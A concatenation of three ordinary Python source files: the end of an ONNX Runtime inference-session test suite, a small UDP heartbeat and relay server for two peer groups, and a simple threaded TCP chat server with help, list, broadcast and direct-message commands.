option = {'device_id': num_device}
sess.set_providers(['CUDAExecutionProvider'], [option])
option = {'device_id': 'non_legit_value'}
sess.set_providers(['CUDAExecutionProvider'], [option])
# configuring the session with an unrecognized option should have no effect
option = {'device_id': 0}
sess.set_providers(['CUDAExecutionProvider'], [option])
option = {'non_legit_option': num_device}
sess.set_providers(['CUDAExecutionProvider'], [option])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
libnames = ('libcuda.so', 'libcuda.dylib', 'cuda.dll')
for libname in libnames:
try:
cuda = ctypes.CDLL(libname)
runBaseTest1()
runBaseTest2()
runAdvancedTest()
except OSError:
continue
else:
break
else:
runBaseTest1()
runBaseTest2()
# raise OSError("could not load any of: " + ' '.join(libnames))
def testInvalidSetProviders(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
sess.set_providers(['InvalidProvider'])
self.assertTrue(
'[\'InvalidProvider\'] does not contain a subset of available providers' in str(context.exception))
def testSessionProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
# create session from scratch, but constrain it to only use the CPU.
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testRunModel(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelFromBytes(self):
with open(get_name("mul_1.onnx"), "rb") as f:
content = f.read()
sess = onnxrt.InferenceSession(content)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2Contiguous(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)[:, [1, 0]]
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
xcontiguous = np.ascontiguousarray(x)
rescontiguous = sess.run([output_name], {input_name: xcontiguous})
np.testing.assert_allclose(output_expected, rescontiguous[0], rtol=1e-05, atol=1e-08)
def testRunModelMultipleThreads(self):
available_providers = onnxrt.get_available_providers()
# Skip this test for a "pure" DML onnxruntime python wheel. We keep this test enabled for instances where both DML and CUDA
# EPs are available (Windows GPU CI pipeline has this config) - this test will pass because CUDA has higher precedence than DML
# and the nodes are assigned to only the CUDA EP (which supports this test)
if ('DmlExecutionProvider' in available_providers and not 'CUDAExecutionProvider' in available_providers):
print("Skipping testRunModelMultipleThreads as the DML EP does not support calling Run() on different threads using the same session object ")
else:
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "MultiThreadsTest"
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
ro1 = onnxrt.RunOptions()
ro1.logid = "thread1"
t1 = threading.Thread(target=self.run_model, args=(sess, ro1))
ro2 = onnxrt.RunOptions()
ro2.logid = "thread2"
t2 = threading.Thread(target=self.run_model, args=(sess, ro2))
t1.start()
t2.start()
t1.join()
t2.join()
def testListAsInput(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
res = sess.run([], {input_name: x.tolist()})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testStringListAsInput(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=np.str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
res = sess.run([], {x_name: x.tolist()})
np.testing.assert_equal(x, res[0])
def testRunDevice(self):
device = onnxrt.get_device()
self.assertTrue('CPU' in device or 'GPU' in device)
def testRunModelSymbolicInput(self):
sess = onnxrt.InferenceSession(get_name("matmul_2.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
# Input X has an unknown dimension.
self.assertEqual(input_shape, ['None', 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
# Output Y has an unknown dimension.
self.assertEqual(output_shape, ['None', 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testBooleanInputs(self):
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=np.bool)
b = np.array([[True, False], [True, False]], dtype=np.bool)
# input1:0 is first in the protobuf, and input:0 is second
# and we maintain the original order.
a_name = sess.get_inputs()[0].name
self.assertEqual(a_name, "input1:0")
a_shape = sess.get_inputs()[0].shape
self.assertEqual(a_shape, [2, 2])
a_type = sess.get_inputs()[0].type
self.assertEqual(a_type, 'tensor(bool)')
b_name = sess.get_inputs()[1].name
self.assertEqual(b_name, "input:0")
b_shape = sess.get_inputs()[1].shape
self.assertEqual(b_shape, [2, 2])
b_type = sess.get_inputs()[0].type
self.assertEqual(b_type, 'tensor(bool)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(bool)')
output_expected = np.array([[True, False], [False, False]], dtype=np.bool)
res = sess.run([output_name], {a_name: a, b_name: b})
np.testing.assert_equal(output_expected, res[0])
def testStringInput1(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=np.str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testStringInput2(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['Olá', '你好', '여보세요', 'hello'], dtype=np.unicode).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputBytes(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test']).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0].astype('|S8'))
def testInputObject(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], object).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputVoid(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test'], np.void).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
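# np.void stores fixed-width raw bytes, so the shorter strings come back padded
# with trailing NUL bytes up to the 8-byte width of 'identity', as expected below.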
expr = np.array([['this\x00\x00\x00\x00', 'is\x00\x00\x00\x00\x00\x00'], ['identity', 'test\x00\x00\x00\x00']],
dtype=object)
np.testing.assert_equal(expr, res[0])
def testRaiseWrongNumInputs(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=np.bool)
res = sess.run([], {'input:0': a})
self.assertTrue('Model requires 2 inputs' in str(context.exception))
def testModelMeta(self):
model_path = "../models/opset8/test_squeezenet/model.onnx"
if not os.path.exists(model_path):
return
sess = onnxrt.InferenceSession(model_path)
modelmeta = sess.get_modelmeta()
self.assertEqual('onnx-caffe2', modelmeta.producer_name)
self.assertEqual('squeezenet_old', modelmeta.graph_name)
self.assertEqual('', modelmeta.domain)
self.assertEqual('', modelmeta.description)
def testProfilerWithSessionOptions(self):
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
sess.run([], {'X': x})
profile_file = sess.end_profiling()
tags = ['pid', 'dur', 'ts', 'ph', 'X', 'name', 'args']
with open(profile_file) as f:
lines = f.readlines()
self.assertTrue('[' in lines[0])
for i in range(1, 8):
for tag in tags:
self.assertTrue(tag in lines[i])
self.assertTrue(']' in lines[8])
def testProfilerGetStartTimeNs(self):
def getSingleSessionProfilingStartTime():
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
return sess.get_profiling_start_time_ns()
# Get 1st profiling's start time
start_time_1 = getSingleSessionProfilingStartTime()
# Get 2nd profiling's start time
start_time_2 = getSingleSessionProfilingStartTime()
# Get 3rd profiling's start time
start_time_3 = getSingleSessionProfilingStartTime()
# Chronological profiling's start time
self.assertTrue(start_time_1 <= start_time_2 <= start_time_3)
def testGraphOptimizationLevel(self):
opt = onnxrt.SessionOptions()
# the default should be ORT_ENABLE_ALL (all optimizations)
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL)
opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED)
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), sess_options=opt)
a = np.array([[True, True], [False, False]], dtype=np.bool)
b = np.array([[True, False], [True, False]], dtype=np.bool)
res = sess.run([], {'input1:0': a, 'input:0': b})
def testSequenceLength(self):
sess = onnxrt.InferenceSession(get_name("sequence_length.onnx"))
x = [
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3))
]
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'seq(tensor(float))')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(int64)')
output_expected = np.array(2, dtype=np.int64)
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testSequenceConstruct(self):
sess = onnxrt.InferenceSession(get_name("sequence_construct.onnx"))
self.assertEqual(sess.get_inputs()[0].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "tensor1")
self.assertEqual(sess.get_inputs()[1].name, "tensor2")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [
np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
]
res = sess.run(
[output_name], {
"tensor1": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"tensor2": np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
})
np.testing.assert_array_equal(output_expected, res[0])
def testSequenceInsert(self):
opt = onnxrt.SessionOptions()
opt.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL
sess = onnxrt.InferenceSession(get_name("sequence_insert.onnx"), sess_options=opt)
self.assertEqual(sess.get_inputs()[0].type, 'seq(tensor(int64))')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "input_seq")
self.assertEqual(sess.get_inputs()[1].name, "tensor")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))]
res = sess.run([output_name], {
"tensor": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"input_seq": []
})
np.testing.assert_array_equal(output_expected, res[0])
def testOrtExecutionMode(self):
opt = onnxrt.SessionOptions()
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL)
opt.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_PARALLEL)
def testLoadingSessionOptionsFromModel(self):
try:
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(1)
sess = onnxrt.InferenceSession(get_name("model_with_valid_ort_config_json.onnx"))
session_options = sess.get_session_options()
self.assertEqual(session_options.inter_op_num_threads, 5) # from the ORT config
self.assertEqual(session_options.intra_op_num_threads, 2) # from the ORT config
self.assertEqual(session_options.execution_mode,
onnxrt.ExecutionMode.ORT_SEQUENTIAL) # default option (not from the ORT config)
self.assertEqual(session_options.graph_optimization_level,
onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL) # from the ORT config
self.assertEqual(session_options.enable_profiling, True) # from the ORT config
except Exception:
raise
finally:
# Make sure the usage of the feature is disabled after this test
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(0)
def testSessionOptionsAddFreeDimensionOverrideByDenotation(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_denotation("DATA_BATCH", 3)
so.add_free_dimension_override_by_denotation("DATA_CHANNEL", 5)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# Free dims with denotations - "DATA_BATCH" and "DATA_CHANNEL" have values assigned to them.
self.assertEqual(input_shape, [3, 5, 5])
def testSessionOptionsAddFreeDimensionOverrideByName(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_name("Dim1", 4)
so.add_free_dimension_override_by_name("Dim2", 6)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# "Dim1" and "Dim2" have values assigned to them.
self.assertEqual(input_shape, [4, 6, 5])
def testSessionOptionsAddConfigEntry(self):
so = onnxrt.SessionOptions()
key = "CONFIG_KEY"
val = "CONFIG_VAL"
so.add_session_config_entry(key, val)
self.assertEqual(so.get_session_config_entry(key), val)
def testInvalidSessionOptionsConfigEntry(self):
so = onnxrt.SessionOptions()
invalid_key = "INVALID_KEY"
with self.assertRaises(RuntimeError) as context:
so.get_session_config_entry(invalid_key)
self.assertTrue(
'SessionOptions does not have configuration with key: ' + invalid_key in str(context.exception))
def testSessionOptionsAddInitializer(self):
# Create an initializer and add it to a SessionOptions instance
so = onnxrt.SessionOptions()
# This initializer is different from the actual initializer in the model for "W"
ortvalue_initializer = onnxrt.OrtValue.ortvalue_from_numpy(np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32))
# The user should manage the life cycle of this OrtValue and should keep it in scope
# as long as any session that is going to be reliant on it is in scope
so.add_initializer("W", ortvalue_initializer)
# Create an InferenceSession that only uses the CPU EP and validate that it uses the
# initializer provided via the SessionOptions instance (overriding the model initializer)
# We only use the CPU EP because the initializer we created is on CPU and we want the model to use that
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), so, ['CPUExecutionProvider'])
res = sess.run(["Y"], {"X": np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)})
self.assertTrue(np.array_equal(res[0], np.array([[2.0, 2.0], [12.0, 12.0], [30.0, 30.0]], dtype=np.float32)))
def testRegisterCustomOpsLibrary(self):
if sys.platform.startswith("win"):
shared_library = 'custom_op_library.dll'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
elif sys.platform.startswith("darwin"):
shared_library = 'libcustom_op_library.dylib'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
else:
shared_library = './libcustom_op_library.so'
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_op_library", "custom_op_test.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
so1 = onnxrt.SessionOptions()
so1.register_custom_ops_library(shared_library)
# Model loading successfully indicates that the custom op node could be resolved successfully
sess1 = onnxrt.InferenceSession(custom_op_model, so1)
#Run with input data
input_name_0 = sess1.get_inputs()[0].name
input_name_1 = sess1.get_inputs()[1].name
output_name = sess1.get_outputs()[0].name
input_0 = np.ones((3,5)).astype(np.float32)
input_1 = np.zeros((3,5)).astype(np.float32)
res = sess1.run([output_name], {input_name_0: input_0, input_name_1: input_1})
output_expected = np.ones((3,5)).astype(np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
# Create an alias of SessionOptions instance
# We will use this alias to construct another InferenceSession
so2 = so1
# Model loading successfully indicates that the custom op node could be resolved successfully
sess2 = onnxrt.InferenceSession(custom_op_model, so2)
# Create another SessionOptions instance with the same shared library referenced
so3 = onnxrt.SessionOptions()
so3.register_custom_ops_library(shared_library)
sess3 = onnxrt.InferenceSession(custom_op_model, so3)
def testOrtValue(self):
numpy_arr_input = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
numpy_arr_output = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
def test_session_with_ortvalue_input(ortvalue):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
res = sess.run(["Y"], {"X": ortvalue})
self.assertTrue(np.array_equal(res[0], numpy_arr_output))
ortvalue1 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input)
self.assertEqual(ortvalue1.device_name(), "cpu")
self.assertEqual(ortvalue1.shape(), [3, 2])
self.assertEqual(ortvalue1.data_type(), "tensor(float)")
self.assertEqual(ortvalue1.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue1)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
ortvalue2 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input, 'cuda', 0)
self.assertEqual(ortvalue2.device_name(), "cuda")
self.assertEqual(ortvalue2.shape(), [3, 2])
self.assertEqual(ortvalue2.data_type(), "tensor(float)")
self.assertEqual(ortvalue2.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue2)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
def testRunModelWithCudaCopyStream(self):
available_providers = onnxrt.get_available_providers()
if (not 'CUDAExecutionProvider' in available_providers):
print("Skipping testRunModelWithCudaCopyStream when CUDA is not available")
else:
# adapted from issue #4829 for a race condition when copy is not on default stream
# note:
# 1. if there are intermittent failure in this test, something is wrong
# 2. it's easier to repro on slower GPU (like M60, Geforce 1070)
# to repro #4829, uncomment the line below to run copy in a separate stream
#onnxrt.capi._pybind_state.set_do_copy_in_default_stream(False)
session = onnxrt.InferenceSession(get_name("issue4829.onnx"))
shape = np.array([2,2], dtype=np.int64)
for iteration in range(100000):
result = session.run(output_names=['output'], input_feed={'shape': shape})
if __name__ == '__main__':
unittest.main()
|
server.py
|
import socket
from threading import Thread
import time
import json
class Service:
def __init__(self, heart_addr):
self.recv_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.send_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.recv_sock.bind(heart_addr)
self.A = {}
self.B = {}
self.serve = True
self.heart_A = {}
self.heart_B = {}
self.start_time = time.time()
pass
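# Hedged reading of the protocol (inferred from the handlers below, not stated
# in the original source): peers register by sending a JSON-encoded id string
# such as "A-00" or "B-00"; ids starting with 'A' are stored in self.A and ids
# starting with 'B' in self.B, the addresses registered under "A-00"/"B-00" are
# used as relay targets in service_send(), and the bare strings "lock"/"unlock"
# set or clear a shared 'lock' flag in both tables.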
'''
#########
Monitor: removes nodes that have gone offline.
Adjust the heartbeat timeout below to decide when a node counts as offline.
#########
'''
def monitor(self):
#################
while self.serve:
time.sleep(5)
for node in list(self.heart_A.keys()):
if time.time()-self.heart_A[node] > 42:
del self.heart_A[node]
del self.A[node]
for node in list(self.heart_B.keys()):
if time.time()-self.heart_B[node] > 42:
del self.heart_B[node]
del self.B[node]
pass
pass
def run(self):
t1 = Thread(target=self.service_recv)
t2 = Thread(target=self.service_send)
time.sleep(2)
t3 = Thread(target=self.monitor)
t1.start()
t2.start()
t3.start()
pass
def service_recv(self):
############
self.recv_sock.setblocking(False)
while self.serve:
try:
data, address = self.recv_sock.recvfrom(1024)
data = json.loads(data.decode('utf-8'))
except:
time.sleep(0.08)
continue
if data == 'lock':
self.A['lock'] = True
self.B['lock'] = True
continue
if data == 'unlock':
try:
del self.A['lock']
del self.B['lock']
except:
pass
continue
if data[0] == 'A':
self.A[data] = address
self.heart_A[data] = time.time()
continue
if data[0] == 'B':
self.B[data] = address
self.heart_B[data] = time.time()
continue
pass
pass
def service_send(self):
last_time = time.time()
while self.serve:
if time.time() - last_time < 5:
time.sleep(0.5)  # avoid busy-waiting between the 5-second broadcasts
continue
last_time = time.time()
try:
data = json.dumps(self.B).encode('utf-8')
self.recv_sock.sendto(data, self.A['A-00'])
except Exception as e:
#print("error:", e)
pass
try:
data = json.dumps(self.A).encode('utf-8')
self.recv_sock.sendto(data, self.B['B-00'])
except Exception as e:
#print("error:", e)
pass
pass
pass
def __del__(self):
self.recv_sock.close()
self.send_sock.close()
del self.recv_sock
del self.send_sock
exit()
|
Host2.py
|
import socket # library needed for communication
import threading # library needed for multithreading
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # connection type and options set
serverRunning = True # flag that the server is running
ip = "127.0.0.1" # local ip address
port = 1234 # any free port will do
clients = {} # connected clients kept in a dictionary
s.bind((ip, port)) # bind the socket
s.listen() # start listening for incoming connections
print('Server Ready...') # announce that the server is ready
print('Ip Address of the Server::%s'%ip) # print the ip address needed to connect
def handleClient(client, uname): # handles a client once its connection is accepted
clientConnected = True # the client is now connected
keys = clients.keys() # usernames currently registered in the clients dictionary
help = 'There are four commands in Messenger\n1::**chatlist=>gives you the list of the people currently online\n2::**quit=>To end your session\n3::**broadcast=>To broadcast your message to each and every person currently present online\n4::Add the name of the person at the end of your message preceded by ** to send it to particular person'
# help text listing the available commands
while clientConnected: # handle messages while the client stays connected
try: # attempt to process one incoming message
msg = client.recv(1024).decode('ascii') # receive up to 1024 bytes and decode them as ascii
response = 'Number of People Online\n' # header of the response
found = False # no recipient matched yet
if '**chatlist' in msg: # if the incoming message is **chatlist
clientNo = 0 # start counting clients from 0
for name in keys: # iterate over the registered usernames
clientNo += 1 # increment the client number for each user
response = response + str(clientNo) +'::' + name+'\n' # append the number and username to the response
client.send(response.encode('ascii')) # send the list back to the client
elif '**help' in msg: # if the incoming message is **help
client.send(help.encode('ascii')) # send the help text to the client
elif '**broadcast' in msg: # if the incoming message is **broadcast
msg = msg.replace('**broadcast','') # strip the command before forwarding
for k,v in clients.items(): # iterate over every connected client
v.send(msg.encode('ascii')) # forward the message to everyone
elif '**quit' in msg: # if the incoming message is **quit
response = 'Stopping Session and exiting...' # prepare the goodbye response
client.send(response.encode('ascii')) # send it to the client
clients.pop(uname) # remove the username from clients
print(uname + ' has been logged out') # log that the user left
clientConnected = False # end the loop for this client
else: # the message is none of the commands above
for name in keys: # look for a **<name> recipient among the usernames
if('**'+name) in msg: # if the message addresses a known user
msg = msg.replace('**'+name, '') # strip the recipient tag before forwarding
clients.get(name).send(msg.encode('ascii')) # send the message to that user only
found = True # a recipient was found
if(not found): # if no recipient matched
client.send('Trying to send message to invalid person.'.encode('ascii')) # warn the sender that the recipient is invalid
except: # on any error while handling the client
clients.pop(uname) # remove the username from clients
print(uname + ' has been logged out') # log that the user left
clientConnected = False # end the loop for this client
while serverRunning: # as long as the server is running
client, address = s.accept() # accept a client connection
uname = client.recv(1024).decode('ascii') # receive the username first
print('%s connected to the server'%str(uname)) # log who connected
client.send('Welcome to Messenger. Type **help to know all the commands'.encode('ascii')) # send the welcome message to the new user
if(client not in clients): # if the client is not already in the clients dictionary
clients[uname] = client # register the client under its username
threading.Thread(target = handleClient, args = (client, uname, )).start() # handle the client on its own thread
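# Hedged companion sketch (not part of the original file): a minimal client for
# the server above, assuming the same 127.0.0.1:1234 address and the
# username-first handshake the accept loop expects. Kept commented out because
# the accept loop above never returns.
#
#   import socket, threading
#
#   def listen(sock):
#       while True:
#           print(sock.recv(1024).decode('ascii'))
#
#   def run_client(uname):
#       sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#       sock.connect(('127.0.0.1', 1234))
#       sock.send(uname.encode('ascii'))  # the server reads the username first
#       threading.Thread(target=listen, args=(sock,), daemon=True).start()
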